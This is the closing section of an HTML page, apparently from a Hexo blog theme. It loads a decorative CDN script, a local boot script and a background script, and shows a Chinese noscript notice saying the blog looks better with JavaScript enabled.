<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/Cherry.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<!-- hexo injector body_end start --><script src="/js/backgroundize.js"></script><!-- hexo injector body_end end --></body>
</html>
